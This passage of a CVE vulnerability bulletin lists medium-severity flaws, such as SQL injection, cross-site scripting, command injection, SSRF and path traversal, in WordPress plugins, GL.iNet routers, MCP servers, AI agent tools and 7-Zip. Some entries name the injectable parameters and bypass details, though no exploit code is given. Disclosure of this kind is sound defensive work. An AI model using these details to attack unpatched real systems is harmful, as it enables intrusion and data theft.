| Ericsson--Packet Core Controller | Ericsson Packet Core Controller (PCC) versions prior to 1.39 contain a vulnerability where an attacker sending a large volume of specially crafted messages may cause service degradation. | 2026-06-05 | 6.5 | CVE-2025-59174 |
| erzhongxmu--JeeWMS | A weakness has been identified in erzhongxmu JeeWMS up to 141740afb2ba14d441c82a833d0a418d07ca2d69. This issue affects some unknown processing of the file /base-boot/actuator of the component Boot Actuator Endpoint. Executing a manipulation can lead to information disclosure. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 5.3 | CVE-2026-11458 |
| expresstech--Quiz and Survey Master (QSM) Easy Quiz and Survey Maker | The Quiz and Survey Master (QSM) - Easy Quiz and Survey Maker plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'order' parameter in all versions up to, and including, 11.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. If the secret key is exposed, this can be exploited by lower-privileged users. | 2026-06-05 | 4.9 | CVE-2026-6448 |
| federicocarrara--rognone | The rognone plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mode' parameter in versions up to, and including, 0.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-06-02 | 6.1 | CVE-2026-1450 |
| federicocarrara--rognone | The rognone plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'a' parameter in versions up to, and including, 0.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-06-02 | 6.1 | CVE-2026-1451 |
| flippercode--WP Maps Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory & Filters | The WP Maps - Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory & Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'location_messages' parameter in all versions up to, and including, 4.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the attacker to hold the custom wpgmp_manage_location capability, which is granted to administrators by default but can be assigned to lower-privileged roles via the plugin's Permissions screen. | 2026-06-06 | 4.4 | CVE-2026-9594 |
| FoundationAgents--MetaGPT | A weakness has been identified in FoundationAgents MetaGPT up to 0.8.2. This affects the function Message.check_instruct_content of the file metagpt/schema.py. Executing a manipulation of the argument mapping can lead to deserialization. The attack is restricted to local execution. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 5.3 | CVE-2026-10566 |
| FoundationAgents--MetaGPT | A vulnerability was determined in FoundationAgents MetaGPT up to 0.8.2. Affected by this issue is the function check_cmd_exists of the file metagpt/utils/common.py. This manipulation of the argument mermaid.path causes command injection. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-07 | 5 | CVE-2026-11455 |
| frankpw--FPW Category Thumbnails | The FPW Category Thumbnails plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the 'fpw_fs_get_file' AJAX action in all versions up to, and including, 1.9.5. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the plugin's settings page. | 2026-06-02 | 6.4 | CVE-2026-2382 |
| Fruitfulcode--Zoner Real Estate | WordPress Theme Zoner Real Estate 4.1.1 contains a persistent cross-site scripting vulnerability that allows authenticated agents to inject malicious scripts through the Address input field when creating properties. Attackers can inject JavaScript payloads in the property creation form that execute when administrators view the property for approval, enabling cookie theft and session hijacking. | 2026-06-04 | 6.4 | CVE-2019-25742 |
| Gigtodoscript--GigToDo | GigToDo 1.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript and HTML code through the proposal description field. Attackers can craft XSS payloads in the create_proposal endpoint that execute when administrators or other users view the stored proposal, enabling cookie theft and malicious redirects. | 2026-06-04 | 6.4 | CVE-2019-25739 |
| Gitlawb--openclaude | OpenClaude is an open-source coding-agent command line interface for cloud and local model providers. Prior to version 0.5.1, the OpenClaude MCP authentication flow starts a temporary local HTTP server to handle OAuth callbacks. To prevent CSRF attacks, the server validates a state parameter against an internally stored value. However, due to a logic flaw in the order of conditionals, an attacker can completely bypass this check and force the server to shut down - without knowing the state value at all. This issue has been patched in version 0.5.1. | 2026-06-02 | 6.5 | CVE-2026-42073 |
| GL.iNet--GL-MT3000 | A security flaw has been discovered in GL.iNet GL-MT3000 up to 4.4.5. Impacted is the function iwinfo_backend of the file iwinfo.so of the component MTK Backend. The manipulation of the argument device results in command injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 4.7 is recommended to address this issue. Upgrading the affected component is recommended. The vendor confirms: "Starting from version 4.7, SDK has added global protection to intercept malicious injection". | 2026-06-07 | 6.3 | CVE-2026-11447 |
| GL.iNet--GL-MT3000 | A security vulnerability has been detected in GL.iNet GL-MT3000 4.4.5. The impacted element is the function rpc_sys of the file /cgi-bin/luci/rpc of the component LuCI JSON-RPC Interface. Such manipulation leads to command injection. The attack may be performed from remote. Upgrading to version 4.8.1 is sufficient to resolve this issue. Upgrading the affected component is advised. The vendor confirms: "The issue discovered by the vulnerability researcher on older firmware versions(4.4.5) has actually been fixed and mitigated in the new version. According to the latest firmware fixes, by default, firmware versions after 4.7.13 do not install LuCI, so this vulnerability cannot be exploited." | 2026-06-07 | 6.3 | CVE-2026-11449 |
| GL.iNet--GL-MT3000 | A weakness has been identified in GL.iNet GL-MT3000 up to 4.4.5. The affected element is the function realpath of the file /rpc of the component Minidlna Service. This manipulation of the argument kube. set causes command injection. The attack is possible to be carried out remotely. Upgrading to version 4.7 is sufficient to fix this issue. It is recommended to upgrade the affected component. The vendor confirms: "Starting from version 4.7, SDK has added global protection to intercept malicious injection". | 2026-06-07 | 4.7 | CVE-2026-11448 |
| GL.iNet--MT3000 | A vulnerability was determined in GL.iNet MT3000 up to 4.4.5. This vulnerability affects unknown code of the file ovpnclient.sh of the component OpenVPN Client Import Workflow. This manipulation causes command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. Upgrading to version 4.9.0_beta3-1012-0513-1778656146 is able to resolve this issue. You should upgrade the affected component. The vendor confirms: "This issue has been addressed by implementing malicious checks on OpenVPN configuration files to prevent command injection attacks carried through malicious configuration files." | 2026-06-06 | 6.3 | CVE-2026-11406 |
| glenwpcoder--Drag and Drop Multiple File Upload for Contact Form 7 | The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'drag_n_drop_text' and 'drag_n_drop_browse_text' Settings in all versions up to, and including, 1.3.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-06 | 4.4 | CVE-2026-8991 |
| go-git--go-billy | Billy is an interface filesystem abstraction for Go. Prior to versions 5.9.0 and 6.0.0-alpha.1, multiple components may improperly handle crafted or malformed input, resulting in panics, infinite loops, uncontrolled recursion, or excessive resource consumption. These issues arise from insufficient validation and missing safety mechanisms such as cycle detection, recursion limits, or defensive handling of unexpected states when processing untrusted repository data and filesystem structures. This issue has been patched in versions 5.9.0 and 6.0.0-alpha.1. | 2026-06-01 | 6.5 | CVE-2026-44740 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, the HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service. Version 26.0.0 fixes the issue. | 2026-06-05 | 6.5 | CVE-2026-46357 |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, an Authenticated Local File Inclusion (LFI) vulnerability in the HAXCMS saveOutline endpoint allows a low-privileged user to read arbitrary files on the server by manipulating the location field written into site.json. This enables attackers to exfiltrate sensitive system files such as /etc/passwd, application secrets, or configuration files accessible to the web server (www-data). Version 26.0.0 patches the issue. | 2026-06-05 | 6.5 | CVE-2026-46397 |
| HCL--iControl | HCL iControl was affected by a Weak Input Validation vulnerability. This weakness is caused during implementation of an architectural security tactic. The product receives input that is expected to be of a certain type, but it does not validate, or incorrectly validates, that the input is actually of the expected type. | 2026-06-04 | 4.3 | CVE-2025-52606 |
| HCLSoftware--Digital Experience & DX Compose | HCL Digital Experience and HCL Digital Experience Compose could be susceptible to Host header injection. An attacker can manipulate the Host header and cause the application to behave in unexpected ways. | 2026-06-05 | 6.1 | CVE-2026-21826 |
| HCLSoftware--DX Compose | HCL Digital Experience Compose is affected by a reflected cross-site scripting (XSS) vulnerability in the search center. An attacker could execute arbitrary JavaScript in the victim's browser. | 2026-06-05 | 6.1 | CVE-2026-21825 |
| hekmon8--Jenkins-server-mcp | A vulnerability has been found in hekmon8 Jenkins-server-mcp 0.1.0. This vulnerability affects the function jobPath of the file src/index.ts of the component get_build_status/get_build_log/trigger_build. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10276 |
| HelloTalk--HelloTalk | HelloTalk through 3.4.1 stores full-precision GPS coordinates even when the user had intended to share only a country or city. Furthermore, these coordinates are placed into a database on the client of other users. (The client side was changed in 2019 to encrypt that database.) | 2026-06-05 | 5.3 | CVE-2020-25900 |
| hiraishikentaro--wezterm-mcp | A vulnerability was identified in hiraishikentaro wezterm-mcp 0.1.0. The affected element is an unknown function of the file src/wezterm_executor.ts of the component switch_pane/write_to_specific_pane. The manipulation of the argument request.params.arguments.pane_id leads to os command injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10279 |
| HKUDS--nanobot | Nanobot prior to version 0.2.1 contains a server-side request forgery vulnerability in the web_fetch tool that allows remote attackers to reach internal or private network hosts by supplying a URL that redirects to a loopback or private address via a 3xx Location header. Attackers can exploit the automatic HTTP redirect following behavior in the httpx library to bypass initial URL validation and cause the runtime to send outbound requests to internal hosts before final resolved URL validation is applied. | 2026-06-01 | 5 | CVE-2026-49138 |
| HKUDS--nanobot | Nanobot prior to version 0.2.1 contains a denial of service vulnerability in the Matrix channel media download handler that allows authenticated room members to exhaust process memory and bandwidth by sending media events with missing or invalid size metadata. Attackers can send multiple concurrent Matrix media events with omitted or invalid declared sizes to trigger simultaneous large media downloads that fully materialize response bodies before post-download rejection, consuming process resources until service degradation occurs. | 2026-06-01 | 4.3 | CVE-2026-49140 |
| holithemes--Click to Chat HoliThemes | The Click to Chat - WA Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [chat] shortcode 'num' parameter in all versions up to, and including, 4.38. This is due to insufficient escaping when embedding user-supplied shortcode attribute values inside JavaScript string literals that are then placed in HTML event-handler attributes. The CCW_Shortcode::shortcode() function applies esc_attr() to the 'num' parameter (line 157), which converts single quotes to the HTML entity `&#039;`. This entity-encoded value is then interpolated directly into a JavaScript window.open() call string delimited by single quotes (line 194/221), and that complete string is placed verbatim into an HTML onclick attribute in the style template files (e.g., sc-style-1.php line 6). Because browsers HTML-decode event attribute values before executing the embedded JavaScript, the `&#039;` entities are decoded back to literal single quotes at runtime, allowing the injected payload to break out of the JavaScript string context and execute arbitrary code. This makes it possible for authenticated attackers with Contributor-level access and above to inject arbitrary web scripts into pages that will execute whenever a user clicks the WhatsApp chat button rendered by the [chat] shortcode. | 2026-06-06 | 6.4 | CVE-2026-7795 |
| iAI Lab--PDF AI App | A security flaw has been discovered in iAI Lab PDF AI App 4.21.0 on Android. Impacted is the function getExternalCacheDir of the component chatpdf.pro. Performing a manipulation of the argument _display_name results in path traversal. The attack requires a local approach. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 4.4 | CVE-2026-11411 |
| indrasishbanerjee--aem-mcp-server | A vulnerability was determined in indrasishbanerjee aem-mcp-server up to b5f833aef9b5dfd17a5991b3b18a8a11edbdc583. This impacts the function getAssetMetadata of the file src/mcp-server.ts of the component Axios Request Flow. Executing a manipulation of the argument assetPath can lead to server-side request forgery. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10274 |
| ishayoyo--excel-mcp | A vulnerability was determined in ishayoyo excel-mcp up to 1.0.2. Impacted is an unknown function of the file src/index.ts of the component read_file/write_file. Executing a manipulation of the argument filePath/outputPath can lead to path traversal. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10278 |
| ITPison--OMICARD EDM | OMICARD EDM developed by ITPison has an Insecure Direct Object Reference vulnerability, allowing unauthenticated remote attackers to modify a specific parameter to obtain a user's email address. | 2026-06-04 | 5.3 | CVE-2026-10597 |
| itsourcecode--Content Management System | A weakness has been identified in itsourcecode Content Management System 1.0. This impacts an unknown function of the file /instructions.php. This manipulation of the argument topic_id causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 6.3 | CVE-2026-10242 |
| itsourcecode--Content Management System | A vulnerability was identified in itsourcecode Content Management System 1.0. This vulnerability affects unknown code of the file /save_comment.php. The manipulation of the argument Name leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2026-06-01 | 6.3 | CVE-2026-10256 |
| itsourcecode--Content Management System | A security flaw has been discovered in itsourcecode Content Management System 1.0. This issue affects some unknown processing of the file /admin/update_ss_img.php. The manipulation of the argument topic_id results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-01 | 6.3 | CVE-2026-10257 |
| itsourcecode--Content Management System | A weakness has been identified in itsourcecode Content Management System 1.0. Impacted is an unknown function of the file /admin/add_sub_topic.php. This manipulation of the argument topic_id causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 6.3 | CVE-2026-10258 |
| itsourcecode--Content Management System | A vulnerability was identified in itsourcecode Content Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit_topic.php. Such manipulation of the argument topic_id leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2026-06-01 | 6.3 | CVE-2026-10265 |
| itsourcecode--Fees Management System | A vulnerability was determined in itsourcecode Fees Management System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php. Executing a manipulation of the argument Username can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-06-01 | 6.3 | CVE-2026-10296 |
| itsourcecode--Fees Management System | A vulnerability was identified in itsourcecode Fees Management System 1.0. This affects an unknown part of the file /manage_course.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-06-01 | 6.3 | CVE-2026-10297 |
| itsourcecode--Fees Management System | A flaw has been found in itsourcecode Fees Management System 1.0. The impacted element is an unknown function of the file /manage_fee.php. Executing a manipulation of the argument ID can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. | 2026-06-01 | 6.3 | CVE-2026-10302 |
| itsourcecode--Fees Management System | A vulnerability was detected in itsourcecode Fees Management System 1.0. Affected is an unknown function of the file /manage_payment.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-06-02 | 6.3 | CVE-2026-10568 |
| itsourcecode--Fees Management System | A vulnerability was identified in itsourcecode Fees Management System 1.0. This affects an unknown function of the file /manage_student.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2026-06-04 | 6.3 | CVE-2026-10808 |
| itsourcecode--Fees Management System | A security flaw has been discovered in itsourcecode Fees Management System 1.0. This impacts an unknown function of the file /manage_user.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-04 | 6.3 | CVE-2026-10809 |
| itsourcecode--Fees Management System | A security vulnerability has been detected in itsourcecode Fees Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /receipt.php. Such manipulation of the argument ef_id leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2026-06-04 | 6.3 | CVE-2026-10811 |
| itsourcecode--Fees Management System | A vulnerability was detected in itsourcecode Fees Management System 1.0. The affected element is an unknown function of the file index.php. Performing a manipulation of the argument page results in cross site scripting. The attack may be initiated remotely. The exploit is now public and may be used. | 2026-06-01 | 4.3 | CVE-2026-10301 |
| itsourcecode--Fees Management System | A weakness has been identified in itsourcecode Fees Management System up to 1.0. Affected is an unknown function of the file /navbar.php. This manipulation of the argument page causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-04 | 4.3 | CVE-2026-10810 |
| j3k0--mcp-google-workspace | A vulnerability was found in j3k0 mcp-google-workspace up to 831790e7d5c2663325733d9f5579cc339a267c4c. This issue affects the function saveToDisk of the file src/tools/gmail.ts of the component MCP Gmail Tool. Performing a manipulation results in improper access controls. It is possible to initiate the attack remotely. The exploit has been made public and could be used. This product uses a rolling release to provide continuous delivery. Therefore, no version details for affected or updated releases are available. The patch is named 89c091ecf8b9f9c7291d1af0b1966e271f86551c. It is suggested to install a patch to address this issue. | 2026-06-01 | 6.3 | CVE-2026-10277 |
| jamesmuga--Remove NoFollow Commenter URL | The Remove NoFollow Commenter URL plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the gmz_comment_settings_save function. This makes it possible for unauthenticated attackers to modify the plugin's comment-display setting via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9730 |
| JeecgBoot--JeecgBoot | A vulnerability was determined in JeecgBoot up to 3.9.2. The affected element is the function WordUtil.addImage of the file /airag/word/edit. Executing a manipulation can lead to server-side request forgery. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. A fix is planned for the upcoming release. | 2026-06-01 | 6.3 | CVE-2026-10239 |
| JeecgBoot--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.2. The impacted element is an unknown function of the file /airag/airagModel/test. The manipulation of the argument baseUrl leads to server-side request forgery. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. A fix is planned for the upcoming release. | 2026-06-01 | 6.3 | CVE-2026-10240 |
| jeecgboot--The server processes these URLs | A security flaw has been discovered in jeecgboot The server processes these URLs up to 3.9.1. This affects the function FileDownloadUtils.download2DiskFromNet of the file /airag/app/debug of the component Cloud Instance Metadata Endpoint. The manipulation results in server-side request forgery. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. Upgrading to version 3.9.2 mitigates this issue. It is suggested to upgrade the affected component. | 2026-06-01 | 6.3 | CVE-2026-10241 |
| jhdscript--ZeM STL | The ZeM STL plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [zemstl] shortcode in all versions up to and including 1.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes, specifically the 'url', 'color', and 'bgcolor' parameters. These attribute values are directly interpolated into HTML attribute context without being passed through esc_attr() or any other escaping function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 6.4 | CVE-2026-4081 |
| Jinher--OA | A weakness has been identified in Jinher OA C6. The affected element is an unknown function of the file /C6/JHSoft.Web.ModuleCount/GetFormSn.aspx. Executing a manipulation of the argument queryID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 6.3 | CVE-2026-11412 |
| jishenghua--jshERP | A security vulnerability has been detected in jishenghua jshERP up to 3.6. This vulnerability affects the function addAccountHeadAndDetail of the file jshERP-boot/src/main/java/com/jsh/erp/service/AccountHeadService.java of the component addAccountHeadAndDetail Endpoint. Such manipulation of the argument fileName leads to path traversal. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-07 | 5.4 | CVE-2026-11467 |
| jishenghua--jshERP | A flaw has been found in jishenghua jshERP up to 3.6. Impacted is the function insertPlatformConfig of the file jshERP-boot/src/main/java/com/jsh/erp/service/PlatformConfigService.java of the component platformConfig Add Endpoint. Executing a manipulation of the argument platformValue can lead to server-side request forgery. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-07 | 4.7 | CVE-2026-11469 |
| johnhuang316--code-index-mcp | A weakness has been identified in johnhuang316 code-index-mcp up to 2.14.0. Affected is the function is_safe_regex_pattern of the component search_code_advanced. Executing a manipulation of the argument regex can lead to inefficient regular expression complexity. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2.14.1 is able to address this issue. This patch is called 25bc02fac74051ddae15ce79e952f00211b1ea6b. Upgrading the affected component is recommended. | 2026-06-02 | 4.3 | CVE-2026-10692 |
| Joomsky--JS Jobs | Joomla com_jsjobs 1.2.6 contains an arbitrary file deletion vulnerability that allows authenticated attackers to delete files by manipulating custom userfield parameters. Attackers can send POST requests to the job.savejob task with path traversal sequences in the field_2 parameter to delete arbitrary files accessible to the web server. | 2026-06-04 | 6.5 | CVE-2019-25740 |
| keystonejs--keystone | A vulnerability was detected in keystonejs keystone up to 20260319. This vulnerability affects unknown code in the library packages/core/src/lib/core/queries/output-field.ts of the component GraphQL API Endpoint. The manipulation results in resource consumption. It is possible to launch the attack remotely. The exploit is now public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 4.3 | CVE-2026-10802 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated attacker to tamper with the internal approval flow configurations of forms belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 6.5 | CVE-2026-23638 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated user to modify resources belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 6.5 | CVE-2026-24753 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated user to modify permissions on resources belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 5.4 | CVE-2026-24755 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated user to modify resources belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 4.3 | CVE-2026-24756 |
| kiteworks--security-advisories | Kiteworks is a private data network (PDN). Prior to version 9.3.0, a stored XSS vulnerability in Kiteworks Secure Data Forms could allow an authenticated attacker to execute arbitrary JavaScript code in other users' sessions. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 5.4 | CVE-2026-24754 |
| klamra22--Klamra Paycal for Aspaclaria | The Klamra Paycal for Aspaclaria plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.4 via the 'invoice_id' parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to download arbitrary customer invoices by enumerating sequential post IDs, exposing sensitive billing PII including full name, email address, phone number, order total, line items, and customer notes belonging to other customers. | 2026-06-06 | 4.3 | CVE-2026-8611 |
| LakshayD02--Hostel-Management-System-PHP | A vulnerability was found in LakshayD02 Hostel-Management-System-PHP up to f87e67c283bab6f718faf2fec6ae39a13bd7036b. This issue affects some unknown processing of the file hostel/index.php of the component Admin Dashboard Page. The manipulation of the argument ID results in missing authorization. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-04 | 6.3 | CVE-2026-10815 |
| latepoint--LatePoint Calendar Booking Plugin for Appointments and Events | The LatePoint - Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.6.0. This is due to missing or incorrect nonce validation on the change_status function. This makes it possible for unauthenticated attackers to change the status of arbitrary invoices - including marking unpaid invoices as paid - without administrator consent via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-05 | 4.3 | CVE-2026-9719 |
| libexpat project--libexpat | libexpat before 2.8.2 lacks handler call depth tracking for calls to XML_GetBuffer, XML_Parse, XML_ParseBuffer, XML_ParserFree, or XML_ParserReset from within handlers in cases of a policy violation. Thus, a use-after-free can occur, | 2026-06-04 | 4.9 | CVE-2026-50219 |
| litonice13--Master Addons For Elementor Widgets, Extensions, Theme Builder, Popup Builder & Template Kits | The Master Addons For Elementor - Widgets, Extensions, Theme Builder, Popup Builder & Template Kits plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'jtlma_custom_js' Page Setting (Custom JS Extension) in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The unfiltered_html capability check is only enforced during Elementor control registration (UI rendering) and not during the save process, enabling Author-level users to inject the jtlma_custom_js setting directly via a crafted POST request to admin-ajax.php?action=elementor_ajax, bypassing the UI-level restriction entirely. | 2026-06-06 | 6.4 | CVE-2026-9281 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains an unauthenticated reflected cross-site scripting vulnerability in the server.log endpoint that allows attackers to inject arbitrary HTML and JavaScript code through the search parameter. Attackers can craft malicious URLs with JavaScript payloads in the search parameter to execute code in users' browsers within the context of the affected application. | 2026-06-05 | 6.1 | CVE-2026-50230 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains a reflected cross-site scripting vulnerability in advanced search parameters that fail to properly sanitize user input before displaying it in search forms. Attackers can inject malicious scripts through unfiltered search parameters to execute arbitrary JavaScript in users' browsers and steal session information. | 2026-06-05 | 6.1 | CVE-2026-50235 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains an arbitrary directory listing vulnerability in its readdirectory query, exposed through both the CLI service (TCP port 9090) and the HTTP JSON-RPC endpoint (/jsonrpc.js). The query accepts a folder parameter and lists its contents with no restriction to the configured media directories and no authentication in the default configuration, allowing a remote, unauthenticated attacker to enumerate arbitrary locations on the host filesystem. | 2026-06-05 | 5.3 | CVE-2026-50233 |
| Mage AI--Mage AI | A vulnerability was detected in Mage AI up to 0.9.79. This impacts the function useMutation of the file mage_ai/frontend/components/Sessions/SignForm/index.tsx of the component Sign-in Flow. Performing a manipulation of the argument query.redirect_url results in cross site scripting. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 4.3 | CVE-2026-11436 |
| Mamunur Rashid--Classified Listing | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Mamunur Rashid Classified Listing allows Path Traversal. This issue affects Classified Listing: from n/a through 5.3.8. | 2026-06-01 | 6.5 | CVE-2026-42679 |
| marcqueralt--DeMomentSomTres Shortcodes | The DeMomentSomTres Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'callout' shortcode in all versions up to, and including, 1.1.1. This is due to insufficient input sanitization and output escaping on the 'width' and 'align' shortcode attributes within the st_callout() function, which concatenates the attribute values directly into an HTML style attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 6.4 | CVE-2026-8885 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.21 through 26.00 contain an uninitialized memory disclosure vulnerability in the UEFI capsule (.scap) parser in 7-Zip. The OpenCapsule function allocates a heap buffer of attacker-declared CapsuleImageSize (up to 1 GiB) without zero-initialization, then reads the file contents into it with ReadStream_FALSE whose return value is silently discarded. If the file is truncated, the unread tail of the buffer retains uninitialized heap memory, which is then exposed as extracted file content via GetStream. Version 26.0.1 fixes the issue. | 2026-06-05 | 6.5 | CVE-2026-48101 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.18 through 26.00 contain a heap out-of-bounds read in the 7-Zip Ar handler's BSD SYMDEF parser. A 4-byte heap out-of-bounds read exists in the Unix ar archive parser in 7-Zip. When parsing a BSD-style __.SYMDEF symbol table, the ParseLibSymbols function reads a 32-bit namesSize field via Get32 at a position that can equal the buffer size, reading 4 bytes past the end of the heap allocation. This reads uninitialized heap data under the default allocator. Version 26.01 patches the issue. | 2026-06-05 | 6.5 | CVE-2026-48112 |
